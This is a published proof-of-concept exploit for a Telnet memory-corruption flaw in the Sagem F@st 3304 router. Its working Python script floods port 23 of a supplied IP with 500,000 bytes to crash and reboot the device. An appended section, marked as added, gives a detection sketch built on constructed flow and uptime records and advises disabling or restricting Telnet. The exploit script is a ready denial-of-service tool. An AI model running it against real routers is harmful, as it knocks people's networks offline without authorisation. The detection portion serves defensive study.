# Title: Sagem F@st 3304-V2 Telnet Crash POC
# Vendor : http://www.sagemcom.com
# Severity : High
# Tested Router: Sagem F@st 3304-V2 (3304-V1, other versions may also be affected)
# Date : 2015-03-08
# Author : Loudiyi Mohamed
# Contact: Loudiyi.2010@gmail.com
# Blog : https://www.linkedin.com/pub/mohamed-loudiyi/86/81b/603
# Vulnerability description:
#==========================
# A memory corruption vulnerability was found in the Sagem F@st 3304-V2 Telnet service. An attacker can crash the router by sending a very long string.
# This exploit connects to Sagem F@st 3304-V2 Telnet (default port 23) and sends a very long string "X"*500000.
# After the exploit is sent, the telnet service will crash and the router will reboot automatically.
# Usage: python SagemDos.py "IP address"
# Code
#========================================================================
#!/usr/bin/python
import socket
import sys

print("######################################")
print("# DOS Sagem F@st3304 v1-v2 #")
print("# ---------- #")
print("# BY LOUDIYI MOHAMED #")
print("#####################################")

# A target host is required as the only argument.
if len(sys.argv) < 2:
    print("Usage: %s <host> " % sys.argv[0])
    print("Example: %s 192.168.1.1 " % sys.argv[0])
    sys.exit(0)

print("\nSending evil buffer...")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    # Connect to the Telnet service on its default port.
    s.connect((sys.argv[1], 23))
    # Oversized input described above: 500000 bytes of "X".
    buffer = b"X" * 500000
    s.send(buffer)
except socket.error:
    print("Could not connect to Sagem Telnet!")
#========================================================================
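
Detection sketch for the behaviour described above (an oversized Telnet write followed by an automatic router reboot), added here as an example and not part of the original PoC. The flow and uptime records, their field layout, the 4096-byte threshold and the 5-minute window are constructed assumptions.

```python
from datetime import datetime, timedelta

# Constructed flow records: (start, client, server, server_port, client_to_server_bytes)
FLOWS = [
    ("2015-03-08T10:00:05", "192.168.1.20", "192.168.1.1", 23, 312),
    ("2015-03-08T10:04:41", "192.168.1.57", "192.168.1.1", 23, 500000),
    ("2015-03-08T10:09:00", "192.168.1.20", "192.168.1.1", 80, 740000),
]
# Constructed uptime polls of the router: (time, device, uptime_seconds)
UPTIME = [
    ("2015-03-08T10:00:00", "192.168.1.1", 86400),
    ("2015-03-08T10:05:00", "192.168.1.1", 12),
    ("2015-03-08T10:10:00", "192.168.1.1", 312),
]
TELNET_PORT = 23
MAX_CLIENT_BYTES = 4096  # assumed ceiling for interactive Telnet input
REBOOT_WINDOW = timedelta(minutes=5)  # assumed correlation window

def parse(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S")

def reboots(samples):
    """Return (device, time) for every poll where uptime went backwards."""
    last, out = {}, []
    for ts, dev, up in sorted(samples):
        if dev in last and up < last[dev]:
            out.append((dev, parse(ts)))
        last[dev] = up
    return out

def detect(flows, samples):
    """Flag oversized Telnet input and note whether the device rebooted soon after."""
    seen = reboots(samples)
    alerts = []
    for ts, src, dst, port, nbytes in flows:
        if port != TELNET_PORT or nbytes <= MAX_CLIENT_BYTES:
            continue
        start = parse(ts)
        followed = any(dev == dst and start <= t <= start + REBOOT_WINDOW
                       for dev, t in seen)
        alerts.append({"src": src, "dst": dst, "bytes": nbytes,
                       "reboot_followed": followed})
    return alerts

if __name__ == "__main__":
    for alert in detect(FLOWS, UPTIME):
        print(alert)
```

An alert with `reboot_followed` set is the stronger signal; the underlying exposure is removed by disabling Telnet on the router or restricting port 23 to a management host.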